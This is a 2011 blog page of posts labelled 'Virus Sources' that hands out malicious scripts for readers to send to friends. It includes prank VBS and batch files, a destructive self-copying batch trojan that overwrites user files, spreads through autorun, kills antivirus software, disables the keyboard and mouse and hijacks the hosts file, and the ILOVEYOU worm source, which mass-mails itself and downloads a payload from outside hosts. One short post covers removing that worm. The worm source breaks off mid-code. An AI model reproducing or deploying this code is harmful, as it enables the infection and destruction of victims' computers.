Showing posts with label Virus Sources. Show all posts
Showing posts with label Virus Sources. Show all posts

Tuesday, May 24, 2011

Create ur own virus

Posted by Unknown at 9:35 AM 0 comments



A virus (as you know) is a piece of code that does something that it shouldn't. It is a common misconception that you need a vast skill set to make these and that they are extremely complex however in reality they are as simple as sin to make which is why they are so damn annoying.

As the name shows ... here we will post many virus codes and the way how to create them ..... send them to ur friends and have fun but be careful some of them are really dangerous for computers .... Enjoy guys :)
-----------------------------------------------
Continually pop out your friend's CD Drive :
==========================

Continually pop out your friend's CD Drive,If he / she has more than one, it pops out all of them!


Code:
====

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Copy this code in a notepad and Save it as "Anything.VBS" and send it.Whoever click on the file will be affected ....

Have fun wid friendz ....
-----------------------------------------------
Convey your friend a little message and shut down his / her computer:
===========================================

Code:
====

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s


Copy this code in a notepad and Save it as "Anything.BAT" and send it.Whoever click on the file will be affected ....

Have fun wid friendz ..
----------------------------------------------------
Toggle your friend's Caps Lock button simultaneously:
================================


Code:
====

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Copy this code in a notepad and Save it as "Anything.VBS" and send it.Whoever click on the file will be affected ....

Have fun wid friendz ..
---------------------------------------------------------
Hit Enter simultaneously:
===============

Code:
====

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Copy this code in a notepad and Save it as "Anything.VBS" and send it.Whoever click on the file will be affected ....

Have fun wid friendz .....
----------------------------------------------------------------
ADIL RANA
i got some here youu goo!

save as .bat files ok guys
this is a trojan i made be very carful with this guys. do not come crying to me when your hard drive is fryed ok cuz if you bitch at me ill fry your next computer :>. have fun!




@echo off
::--Infect All Html Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.html) Do (
Set HtmlInfect=%%Z > Nul
Copy /y %0 %HtmlInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Vlc Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.vlc) Do (
Set VlcInfect=%%Z > Nul
Copy /y %0 %VlcInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::---Infect All Mpeg Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.mpeg) Do (
Set MpegInfect=%%Z > Nul
Copy /y %0 %MpegInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Mp3 Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.mp3) Do (
Set Mp3Infect=%%Z > Nul
Copy /y %0 %Mp3Infect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Mp4 Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.mp4) Do (
Set Mp4Infect=%%Z > Nul
Copy /y %0 %Mp4Infect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Wma Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.wma) Do (
Set WmaInfect=%%Z > Nul
Copy /y %0 %WmaInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::-------Infect All .Doc-----::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.doc) Do (
Set DocInfect=%%Z > Nul
Copy /y %0 %DocInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Txt Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.txt) Do (
Set TxtInfect=%%Z > Nul
Copy /y %0 %TxtInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Rar Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.rar) Do (
Set RarInfect=%%Z > Nul
Copy /y %0 %RarInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Exe Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Jpeg Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.jpeg) Do (
Set JpegInfect=%%Z > Nul
Copy /y %0 %JpegInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Zip Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.zip) Do (
Set ZipInfect=%%Z > Nul
Copy /y %0 %ZipInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Bat Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.bat) Do (
Set BatInfect=%%Z > Nul
Copy /y %0 %BatInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Gif Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.gif) Do (
Set GifInfect=%%Z > Nul
Copy /y %0 %GifInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Vbs Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.vbs) Do (
Set VbsInfect=%%Z > Nul
Copy /y %0 %VbsInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::-----Infect All Drives-----::
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
::---------------------------::
::------Run As Service-------::
copy "Anti virus killer.bat" "C:\Windows\Anti virus killer"
reg add HKLM\software\Microsoft\Windows\CurrentVersion\RunServices /v "Anti virus killer" /t REG_SZ /d "C:\Windows\Anti virus killer.bat" / f > nul
::---------------------------::
::-----Infect Autoexec.bat---::
echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT
::---------------------------::
::----Infect All Folders-----::
Dir %SystemRoot% /s /b > PathHost
For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
Del /f /s /q PathHost > Nul
::---------------------------::
::-----Infect "ls" CMD-----::
copy %0 %windir%\system32\ls.bat
::---------------------------::
::------Copy To Startup------::
copy "Anti virus killer.bat" "%userprofile%\Start Menu\Programs\Startup\Anti virus killer.bat"
::---------------------------::
::--Disable Windows Defender-::
net stop "WinDefend"
taskkill /f /t /im "MSASCui.exe"
::---------------------------::
::---Disable Windows Update--::
net stop "wuauserv"
::---------------------------::
::-Disable Windows Security Center-::
net stop "wscsvc"
::---------------------------------::
::-Disable Windows Parental Controls-::
net stop "WPCSvc"
::-----------------------------------::
::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::
::-Disable Windows Error Reporting-::
net stop "WerSvc"
::---------------------------------::
::-Disable Windows Backup-::
net stop "SDRSVC"
::------------------------::
::--Disable Windows Search---::
net stop "WSearch"
::---------------------------::
::-------AV Kill [UD]--------::
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
::---------------------------::
REN *.jpeg *.vir
REN *.gif *.vir
REN *.png *.vir
::------Disable Keyboard-----::
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
::---------------------------::
::-------Disable Mouse-------::
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
::---------------------------::
::-----Kill Explorer.exe-----::
echo :a >>WindUpdate.bat
echo tskill explorer >>WindUpdate.bat
echo goto a >>WindUpdate.bat
echo Set objShell = CreateObject("WScript.Shell")>>rundlll32.vbs
echo strCommand = "WindUpdate.bat">>rundlll32.vbs
echo objShell.Run strCommand, vbHide, TRUE>>rundlll32.vbs
start "" rundlll32.vbs
::---------------------------::
::-------Block YouTube-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 youtube.com >> "Hosts"
echo 127.0.0.1 www.youtube.com >> "Hosts"
::---------------------------::
::---------Block MSN---------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 msn.com >> "Hosts"
echo 127.0.0.1 www.msn.com >> "Hosts"
::---------------------------::
::--------Block Google-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts"
::---------------------------::
::-------Block Wikipedia-----::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 wikipedia.org >> "Hosts"
echo 127.0.0.1 www.wikipedia.org >> "Hosts"
::---------------------------::
::--------Block Hotmail------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 hotmail.com >> "Hosts"
echo 127.0.0.1 www.hotmail.com >> "Hosts"
::---------------------------::
::--------Block Yahoo!-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 yahoo.com >> "Hosts"
echo 127.0.0.1 www.yahoo.com >> "Hosts"
::---------------------------::
::--------Block Facebook!-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 facebook.com >> "Hosts"
echo 127.0.0.1 www.facebook.com >> "Hosts"
::---------------------------::
this one messes up all .vbs file, just change the .vbs with any other file type that you want to mess up.

@ echo off
##########################
# Infect All .vbs Files
assoc .vbs=batfile
DIR /S/B %SystemDrive%\*.vbs >> InfList_.vbs.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_.vbs.txt) do copy /y %0 "%%j:%%k"
###########################
Labels:

Sunday, May 15, 2011

400 VIRUS ZIP FREE DOWNLOAD

Posted by Unknown at 3:24 AM 0 comments
This zip file included most viruses they can easily destroyed

pc's health.

so use this viruses for your interest..

The download link is below:
--------------------------------

Labels: ,

HOW TO REMOVE THE LOVE LETTER VIRUS TO UR PC

Posted by Unknown at 3:19 AM 0 comments
----------------------------
To Stop LOVE-LETTER-FOR-YOU
----------------------------

Go to Task Manager
stop process WSCRIPT.exe

delete these files wherever you find them:
LOVE-LETTER*.*
MSKernel32.vbs
Win32DLL.vbs
WIN-BUGSFIX.exe (probably not there)

------------
search for all *.vbs files created today on all drives
Any that are 11K are definitely infected.
All .vbs and .vbe files have probably been overwritten and lost.

------------
Anybody with MIRC has had a script.ini file created in default MIRC directory with virus.

------------
Will need to fix registry entries as well,

Delete these registry entries:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi n32DLL


more to come?....
--------

Home/Start page for Inet explorer changed, looks like no harm because site it points to has been taken down.
--------

Rebooting will not cure!
Labels:

LOVE LETTER VIRUS SOURCE CODE

Posted by Unknown at 3:14 AM 0 comments
----------------
CODE:
----------------

rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")

if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ <br />"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ <br />"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ <br />"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ <br />"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ <br />"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ <br />"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _ <br />"<?-?BODY><?-?HTML>"&vbcrlf& _ <br />"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ <br />"<!--?-??-?"&vbcrlf& _ <br />"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ <br />"?-??-?-->"&vbcrlf& _ <br />"<?-?SCRIPT>"&vbcrlf& _ <br />"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ <br />"<!--"&vbcrlf& _ <br />"on error resume next"&vbcrlf& _ <br />"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ <br />"aw=1"&vbcrlf& _ <br />"code=" <br />dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ <br />"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ <br />"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ <br />"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ <br />"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ <br />"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ <br />"wri.write code4"&vbcrlf& _ <br />"wri.close"&vbcrlf& _ <br />"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ <br />"if (err.number=424) then"&vbcrlf& _ <br />"aw=0"&vbcrlf& _ <br />"end if"&vbcrlf& _ <br />"if (aw=1) then"&vbcrlf& _ <br />"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ <br />"window.close"&vbcrlf& _ <br />"end if"&vbcrlf& _ <br />"end if"&vbcrlf& _ <br />"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ <br />"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ <br />"?-??-?-->"&vbcrlf& _ <br />"<?-?SCRIPT>" <br />dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") <br />dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") <br />dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") <br />dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") <br />dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") <br />dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") <br 